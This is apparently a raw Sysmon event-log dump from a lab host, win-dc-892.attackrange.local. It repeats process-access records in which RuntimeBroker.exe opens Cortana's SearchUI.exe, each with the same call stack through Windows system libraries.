12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 